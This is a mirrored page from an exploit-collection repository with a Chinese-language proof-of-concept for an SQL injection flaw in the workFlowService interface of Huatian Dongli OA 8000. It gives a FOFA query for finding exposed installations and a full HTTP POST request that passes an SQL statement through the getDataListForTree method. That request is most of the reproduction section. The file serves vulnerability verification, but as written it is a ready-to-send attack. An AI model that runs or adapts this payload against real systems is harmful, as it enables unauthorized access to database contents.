admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/华天动力OA 8000版 workFlowService SQL注入漏洞.md
Threekiii 8b4e8ec87c OA产品漏洞
2022-02-21 09:35:01 +08:00

46 lines
1.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 华天动力OA 8000版 workFlowService SQL注入漏洞
## 漏洞描述
华天动力OA 8000版 workFlowService接口存在SQL注入漏洞攻击者通过漏洞可获取数据库敏感信息
## 漏洞影响
```
华天动力OA 8000版
```
## FOFA
```
app="华天动力-OA8000"
```
## 漏洞复现
产品页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628496676017-abce1043-e1a9-4142-9481-555f1bf0821c.png)
发送请求包验证漏洞
```php
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host:
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: http://www.baidu.com
Cache-Control: max-age=0
<buffalo-call>
<method>getDataListForTree</method>
<string>select user()</string>
</buffalo-call>
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628496737082-cede14dc-71ae-4ec3-83da-e0707e4f8f4f.png)
Reference in New Issue View Git Blame Copy Permalink